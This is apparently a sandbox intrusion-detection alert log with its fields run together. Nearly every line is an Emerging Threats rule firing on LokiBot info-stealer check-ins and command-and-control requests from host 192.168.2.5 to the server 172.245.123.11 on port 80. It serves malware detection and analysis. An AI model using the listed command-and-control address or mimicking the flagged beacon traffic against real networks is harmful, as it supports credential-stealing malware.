                                                              2025-01-07T11:02:17.278413+01002025381ET MALWARE LokiBot Checkin1192.168.2.549748172.245.123.1180TCP
                                                              2025-01-07T11:02:17.278413+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549748172.245.123.1180TCP
                                                              2025-01-07T11:02:17.794738+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549748172.245.123.1180TCP
                                                              2025-01-07T11:02:17.794738+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549748172.245.123.1180TCP
                                                              2025-01-07T11:02:17.799464+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549748TCP
                                                              2025-01-07T11:02:17.961173+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549754172.245.123.1180TCP
                                                              2025-01-07T11:02:17.961173+01002025381ET MALWARE LokiBot Checkin1192.168.2.549754172.245.123.1180TCP
                                                              2025-01-07T11:02:17.961173+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549754172.245.123.1180TCP
                                                              2025-01-07T11:02:18.478664+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549754172.245.123.1180TCP
                                                              2025-01-07T11:02:18.478664+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549754172.245.123.1180TCP
                                                              2025-01-07T11:02:18.483475+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549754TCP
                                                              2025-01-07T11:02:18.640081+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549760172.245.123.1180TCP
                                                              2025-01-07T11:02:18.640081+01002025381ET MALWARE LokiBot Checkin1192.168.2.549760172.245.123.1180TCP
                                                              2025-01-07T11:02:18.640081+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549760172.245.123.1180TCP
                                                              2025-01-07T11:02:19.157102+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549760172.245.123.1180TCP
                                                              2025-01-07T11:02:19.157102+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549760172.245.123.1180TCP
                                                              2025-01-07T11:02:19.162697+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549760TCP
                                                              2025-01-07T11:02:19.327075+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549766172.245.123.1180TCP
                                                              2025-01-07T11:02:19.327075+01002025381ET MALWARE LokiBot Checkin1192.168.2.549766172.245.123.1180TCP
                                                              2025-01-07T11:02:19.327075+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549766172.245.123.1180TCP
                                                              2025-01-07T11:02:19.851955+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549766172.245.123.1180TCP
                                                              2025-01-07T11:02:19.851955+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549766172.245.123.1180TCP
                                                              2025-01-07T11:02:19.856728+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549766TCP
                                                              2025-01-07T11:02:20.043059+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549772172.245.123.1180TCP
                                                              2025-01-07T11:02:20.043059+01002025381ET MALWARE LokiBot Checkin1192.168.2.549772172.245.123.1180TCP
                                                              2025-01-07T11:02:20.043059+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549772172.245.123.1180TCP
                                                              2025-01-07T11:02:20.564861+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549772172.245.123.1180TCP
                                                              2025-01-07T11:02:20.564861+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549772172.245.123.1180TCP
                                                              2025-01-07T11:02:20.569615+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549772TCP
                                                              2025-01-07T11:02:20.742103+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549778172.245.123.1180TCP
                                                              2025-01-07T11:02:20.742103+01002025381ET MALWARE LokiBot Checkin1192.168.2.549778172.245.123.1180TCP
                                                              2025-01-07T11:02:20.742103+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549778172.245.123.1180TCP
                                                              2025-01-07T11:02:21.267286+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549778172.245.123.1180TCP
                                                              2025-01-07T11:02:21.267286+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549778172.245.123.1180TCP
                                                              2025-01-07T11:02:21.272044+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549778TCP
                                                              2025-01-07T11:02:21.431219+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549784172.245.123.1180TCP
                                                              2025-01-07T11:02:21.431219+01002025381ET MALWARE LokiBot Checkin1192.168.2.549784172.245.123.1180TCP
                                                              2025-01-07T11:02:21.431219+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549784172.245.123.1180TCP
                                                              2025-01-07T11:02:21.949590+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549784172.245.123.1180TCP
                                                              2025-01-07T11:02:21.949590+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549784172.245.123.1180TCP
                                                              2025-01-07T11:02:21.954458+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549784TCP
                                                              2025-01-07T11:02:22.122622+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549790172.245.123.1180TCP
                                                              2025-01-07T11:02:22.122622+01002025381ET MALWARE LokiBot Checkin1192.168.2.549790172.245.123.1180TCP
                                                              2025-01-07T11:02:22.122622+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549790172.245.123.1180TCP
                                                              2025-01-07T11:02:22.615903+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549790172.245.123.1180TCP
                                                              2025-01-07T11:02:22.615903+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549790172.245.123.1180TCP
                                                              2025-01-07T11:02:22.616022+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549790TCP
                                                              2025-01-07T11:02:22.801706+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549795172.245.123.1180TCP
                                                              2025-01-07T11:02:22.801706+01002025381ET MALWARE LokiBot Checkin1192.168.2.549795172.245.123.1180TCP
                                                              2025-01-07T11:02:22.801706+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549795172.245.123.1180TCP
                                                              2025-01-07T11:02:23.331353+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549795172.245.123.1180TCP
                                                              2025-01-07T11:02:23.331353+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549795172.245.123.1180TCP
                                                              2025-01-07T11:02:23.331357+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549795TCP
                                                              2025-01-07T11:02:23.524470+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549801172.245.123.1180TCP
                                                              2025-01-07T11:02:23.524470+01002025381ET MALWARE LokiBot Checkin1192.168.2.549801172.245.123.1180TCP
                                                              2025-01-07T11:02:23.524470+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549801172.245.123.1180TCP
                                                              2025-01-07T11:02:24.058134+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549801172.245.123.1180TCP
                                                              2025-01-07T11:02:24.058134+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549801172.245.123.1180TCP
                                                              2025-01-07T11:02:24.064050+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549801TCP
                                                              2025-01-07T11:02:24.248034+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549804172.245.123.1180TCP
                                                              2025-01-07T11:02:24.248034+01002025381ET MALWARE LokiBot Checkin1192.168.2.549804172.245.123.1180TCP
                                                              2025-01-07T11:02:24.248034+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549804172.245.123.1180TCP
                                                              2025-01-07T11:02:24.758689+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549804172.245.123.1180TCP
                                                              2025-01-07T11:02:24.758689+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549804172.245.123.1180TCP
                                                              2025-01-07T11:02:24.766691+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549804TCP
                                                              2025-01-07T11:02:24.981285+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549810172.245.123.1180TCP
                                                              2025-01-07T11:02:24.981285+01002025381ET MALWARE LokiBot Checkin1192.168.2.549810172.245.123.1180TCP
                                                              2025-01-07T11:02:24.981285+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549810172.245.123.1180TCP
                                                              2025-01-07T11:02:25.495647+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549810172.245.123.1180TCP
                                                              2025-01-07T11:02:25.495647+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549810172.245.123.1180TCP
                                                              2025-01-07T11:02:25.495830+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549810TCP
                                                              2025-01-07T11:02:25.670616+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549815172.245.123.1180TCP
                                                              2025-01-07T11:02:25.670616+01002025381ET MALWARE LokiBot Checkin1192.168.2.549815172.245.123.1180TCP
                                                              2025-01-07T11:02:25.670616+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549815172.245.123.1180TCP
                                                              2025-01-07T11:02:26.182014+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549815172.245.123.1180TCP
                                                              2025-01-07T11:02:26.182014+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549815172.245.123.1180TCP
                                                              2025-01-07T11:02:26.182034+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549815TCP
                                                              2025-01-07T11:02:26.424356+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549821172.245.123.1180TCP
                                                              2025-01-07T11:02:26.424356+01002025381ET MALWARE LokiBot Checkin1192.168.2.549821172.245.123.1180TCP
                                                              2025-01-07T11:02:26.424356+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549821172.245.123.1180TCP
                                                              2025-01-07T11:02:26.935612+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549821172.245.123.1180TCP
                                                              2025-01-07T11:02:26.935612+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549821172.245.123.1180TCP
                                                              2025-01-07T11:02:26.940462+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549821TCP
                                                              2025-01-07T11:02:27.144150+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549828172.245.123.1180TCP
                                                              2025-01-07T11:02:27.144150+01002025381ET MALWARE LokiBot Checkin1192.168.2.549828172.245.123.1180TCP
                                                              2025-01-07T11:02:27.144150+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549828172.245.123.1180TCP
                                                              2025-01-07T11:02:27.636276+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549828172.245.123.1180TCP
                                                              2025-01-07T11:02:27.636276+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549828172.245.123.1180TCP
                                                              2025-01-07T11:02:27.641073+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549828TCP
                                                              2025-01-07T11:02:27.947960+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549834172.245.123.1180TCP
                                                              2025-01-07T11:02:27.947960+01002025381ET MALWARE LokiBot Checkin1192.168.2.549834172.245.123.1180TCP
                                                              2025-01-07T11:02:27.947960+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549834172.245.123.1180TCP
                                                              2025-01-07T11:02:28.470234+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549834172.245.123.1180TCP
                                                              2025-01-07T11:02:28.470234+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549834172.245.123.1180TCP
                                                              2025-01-07T11:02:28.470446+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549834TCP
                                                              2025-01-07T11:02:28.637968+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549839172.245.123.1180TCP
                                                              2025-01-07T11:02:28.637968+01002025381ET MALWARE LokiBot Checkin1192.168.2.549839172.245.123.1180TCP
                                                              2025-01-07T11:02:28.637968+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549839172.245.123.1180TCP
                                                              2025-01-07T11:02:29.132407+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549839172.245.123.1180TCP
                                                              2025-01-07T11:02:29.132407+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549839172.245.123.1180TCP
                                                              2025-01-07T11:02:29.132414+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549839TCP
                                                              2025-01-07T11:02:29.308443+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549843172.245.123.1180TCP
                                                              2025-01-07T11:02:29.308443+01002025381ET MALWARE LokiBot Checkin1192.168.2.549843172.245.123.1180TCP
                                                              2025-01-07T11:02:29.308443+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549843172.245.123.1180TCP
                                                              2025-01-07T11:02:29.819500+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549843172.245.123.1180TCP
                                                              2025-01-07T11:02:29.819500+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549843172.245.123.1180TCP
                                                              2025-01-07T11:02:29.819607+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549843TCP
                                                              2025-01-07T11:02:30.085557+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549849172.245.123.1180TCP
                                                              2025-01-07T11:02:30.085557+01002025381ET MALWARE LokiBot Checkin1192.168.2.549849172.245.123.1180TCP
                                                              2025-01-07T11:02:30.085557+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549849172.245.123.1180TCP
                                                              2025-01-07T11:02:30.594718+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549849172.245.123.1180TCP
                                                              2025-01-07T11:02:30.594718+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549849172.245.123.1180TCP
                                                              2025-01-07T11:02:30.599583+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549849TCP
                                                              2025-01-07T11:02:30.768828+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549854172.245.123.1180TCP
                                                              2025-01-07T11:02:30.768828+01002025381ET MALWARE LokiBot Checkin1192.168.2.549854172.245.123.1180TCP
                                                              2025-01-07T11:02:30.768828+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549854172.245.123.1180TCP
                                                              2025-01-07T11:02:31.270511+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549854172.245.123.1180TCP
                                                              2025-01-07T11:02:31.270511+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549854172.245.123.1180TCP
                                                              2025-01-07T11:02:31.280966+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549854TCP
                                                              2025-01-07T11:02:31.465790+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549860172.245.123.1180TCP
                                                              2025-01-07T11:02:31.465790+01002025381ET MALWARE LokiBot Checkin1192.168.2.549860172.245.123.1180TCP
                                                              2025-01-07T11:02:31.465790+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549860172.245.123.1180TCP
                                                              2025-01-07T11:02:31.967447+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549860172.245.123.1180TCP
                                                              2025-01-07T11:02:31.967447+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549860172.245.123.1180TCP
                                                              2025-01-07T11:02:31.972261+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549860TCP
                                                              2025-01-07T11:02:32.162958+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549865172.245.123.1180TCP
                                                              2025-01-07T11:02:32.162958+01002025381ET MALWARE LokiBot Checkin1192.168.2.549865172.245.123.1180TCP
                                                              2025-01-07T11:02:32.162958+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549865172.245.123.1180TCP
                                                              2025-01-07T11:02:32.650824+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549865172.245.123.1180TCP
                                                              2025-01-07T11:02:32.650824+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549865172.245.123.1180TCP
                                                              2025-01-07T11:02:32.650889+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549865TCP
                                                              2025-01-07T11:02:33.125642+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549872172.245.123.1180TCP
                                                              2025-01-07T11:02:33.125642+01002025381ET MALWARE LokiBot Checkin1192.168.2.549872172.245.123.1180TCP
                                                              2025-01-07T11:02:33.125642+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549872172.245.123.1180TCP
                                                              2025-01-07T11:02:33.618441+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549872172.245.123.1180TCP
                                                              2025-01-07T11:02:33.618441+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549872172.245.123.1180TCP
                                                              2025-01-07T11:02:33.623252+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549872TCP
                                                              2025-01-07T11:02:33.779104+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549877172.245.123.1180TCP
                                                              2025-01-07T11:02:33.779104+01002025381ET MALWARE LokiBot Checkin1192.168.2.549877172.245.123.1180TCP
                                                              2025-01-07T11:02:33.779104+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549877172.245.123.1180TCP
                                                              2025-01-07T11:02:34.281865+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549877172.245.123.1180TCP
                                                              2025-01-07T11:02:34.281865+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549877172.245.123.1180TCP
                                                              2025-01-07T11:02:34.286606+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549877TCP
                                                              2025-01-07T11:02:34.503792+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549883172.245.123.1180TCP
                                                              2025-01-07T11:02:34.503792+01002025381ET MALWARE LokiBot Checkin1192.168.2.549883172.245.123.1180TCP
                                                              2025-01-07T11:02:34.503792+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549883172.245.123.1180TCP
                                                              2025-01-07T11:02:35.003595+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549883172.245.123.1180TCP
                                                              2025-01-07T11:02:35.003595+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549883172.245.123.1180TCP
                                                              2025-01-07T11:02:35.008395+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549883TCP
                                                              2025-01-07T11:02:35.152174+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549889172.245.123.1180TCP
                                                              2025-01-07T11:02:35.152174+01002025381ET MALWARE LokiBot Checkin1192.168.2.549889172.245.123.1180TCP
                                                              2025-01-07T11:02:35.152174+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549889172.245.123.1180TCP
                                                              2025-01-07T11:02:35.669509+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549889172.245.123.1180TCP
                                                              2025-01-07T11:02:35.669509+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549889172.245.123.1180TCP
                                                              2025-01-07T11:02:35.674272+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549889TCP
                                                              2025-01-07T11:02:35.829436+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549895172.245.123.1180TCP
                                                              2025-01-07T11:02:35.829436+01002025381ET MALWARE LokiBot Checkin1192.168.2.549895172.245.123.1180TCP
                                                              2025-01-07T11:02:35.829436+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549895172.245.123.1180TCP
                                                              2025-01-07T11:02:36.331257+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549895172.245.123.1180TCP
                                                              2025-01-07T11:02:36.331257+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549895172.245.123.1180TCP
                                                              2025-01-07T11:02:36.336073+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549895TCP
                                                              2025-01-07T11:02:36.478731+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549901172.245.123.1180TCP
                                                              2025-01-07T11:02:36.478731+01002025381ET MALWARE LokiBot Checkin1192.168.2.549901172.245.123.1180TCP
                                                              2025-01-07T11:02:36.478731+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549901172.245.123.1180TCP
                                                              2025-01-07T11:02:36.981306+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549901172.245.123.1180TCP
                                                              2025-01-07T11:02:36.981306+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549901172.245.123.1180TCP
                                                              2025-01-07T11:02:36.981365+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549901TCP
                                                              2025-01-07T11:02:37.135567+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549907172.245.123.1180TCP
                                                              2025-01-07T11:02:37.135567+01002025381ET MALWARE LokiBot Checkin1192.168.2.549907172.245.123.1180TCP
                                                              2025-01-07T11:02:37.135567+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549907172.245.123.1180TCP
                                                              2025-01-07T11:02:37.629932+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549907172.245.123.1180TCP
                                                              2025-01-07T11:02:37.629932+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549907172.245.123.1180TCP
                                                              2025-01-07T11:02:37.637059+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549907TCP
                                                              2025-01-07T11:02:37.908206+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549912172.245.123.1180TCP
                                                              2025-01-07T11:02:37.908206+01002025381ET MALWARE LokiBot Checkin1192.168.2.549912172.245.123.1180TCP
                                                              2025-01-07T11:02:37.908206+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549912172.245.123.1180TCP
                                                              2025-01-07T11:02:38.440568+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549912172.245.123.1180TCP
                                                              2025-01-07T11:02:38.440568+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549912172.245.123.1180TCP
                                                              2025-01-07T11:02:38.445345+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549912TCP
                                                              2025-01-07T11:02:38.589708+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549915172.245.123.1180TCP
                                                              2025-01-07T11:02:38.589708+01002025381ET MALWARE LokiBot Checkin1192.168.2.549915172.245.123.1180TCP
                                                              2025-01-07T11:02:38.589708+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549915172.245.123.1180TCP
                                                              2025-01-07T11:02:39.104350+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549915172.245.123.1180TCP
                                                              2025-01-07T11:02:39.104350+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549915172.245.123.1180TCP
                                                              2025-01-07T11:02:39.109905+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549915TCP
                                                              2025-01-07T11:02:39.258110+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549920172.245.123.1180TCP
                                                              2025-01-07T11:02:39.258110+01002025381ET MALWARE LokiBot Checkin1192.168.2.549920172.245.123.1180TCP
                                                              2025-01-07T11:02:39.258110+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549920172.245.123.1180TCP
                                                              2025-01-07T11:02:39.771926+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549920172.245.123.1180TCP
                                                              2025-01-07T11:02:39.771926+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549920172.245.123.1180TCP
                                                              2025-01-07T11:02:39.776713+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549920TCP
                                                              2025-01-07T11:02:39.972590+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549926172.245.123.1180TCP
                                                              2025-01-07T11:02:39.972590+01002025381ET MALWARE LokiBot Checkin1192.168.2.549926172.245.123.1180TCP
                                                              2025-01-07T11:02:39.972590+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549926172.245.123.1180TCP
                                                              2025-01-07T11:02:40.445565+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549926172.245.123.1180TCP
                                                              2025-01-07T11:02:40.445565+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549926172.245.123.1180TCP
                                                              2025-01-07T11:02:40.452674+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549926TCP
                                                              2025-01-07T11:02:40.635703+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549932172.245.123.1180TCP
                                                              2025-01-07T11:02:40.635703+01002025381ET MALWARE LokiBot Checkin1192.168.2.549932172.245.123.1180TCP
                                                              2025-01-07T11:02:40.635703+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549932172.245.123.1180TCP
                                                              2025-01-07T11:02:41.134057+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549932172.245.123.1180TCP
                                                              2025-01-07T11:02:41.134057+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549932172.245.123.1180TCP
                                                              2025-01-07T11:02:41.138836+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549932TCP
                                                              2025-01-07T11:02:41.303821+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549934172.245.123.1180TCP
                                                              2025-01-07T11:02:41.303821+01002025381ET MALWARE LokiBot Checkin1192.168.2.549934172.245.123.1180TCP
                                                              2025-01-07T11:02:41.303821+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549934172.245.123.1180TCP
                                                              2025-01-07T11:02:41.803713+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549934172.245.123.1180TCP
                                                              2025-01-07T11:02:41.803713+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549934172.245.123.1180TCP
                                                              2025-01-07T11:02:41.803936+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549934TCP
                                                              2025-01-07T11:02:41.967237+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549940172.245.123.1180TCP
                                                              2025-01-07T11:02:41.967237+01002025381ET MALWARE LokiBot Checkin1192.168.2.549940172.245.123.1180TCP
                                                              2025-01-07T11:02:41.967237+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549940172.245.123.1180TCP
                                                              2025-01-07T11:02:42.460094+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549940172.245.123.1180TCP
                                                              2025-01-07T11:02:42.460094+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549940172.245.123.1180TCP
                                                              2025-01-07T11:02:42.465580+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549940TCP
                                                              2025-01-07T11:02:42.625053+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549946172.245.123.1180TCP
                                                              2025-01-07T11:02:42.625053+01002025381ET MALWARE LokiBot Checkin1192.168.2.549946172.245.123.1180TCP
                                                              2025-01-07T11:02:42.625053+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549946172.245.123.1180TCP
                                                              2025-01-07T11:02:43.145887+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549946172.245.123.1180TCP
                                                              2025-01-07T11:02:43.145887+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549946172.245.123.1180TCP
                                                              2025-01-07T11:02:43.151462+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549946TCP
                                                              2025-01-07T11:02:43.363394+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549952172.245.123.1180TCP
                                                              2025-01-07T11:02:43.363394+01002025381ET MALWARE LokiBot Checkin1192.168.2.549952172.245.123.1180TCP
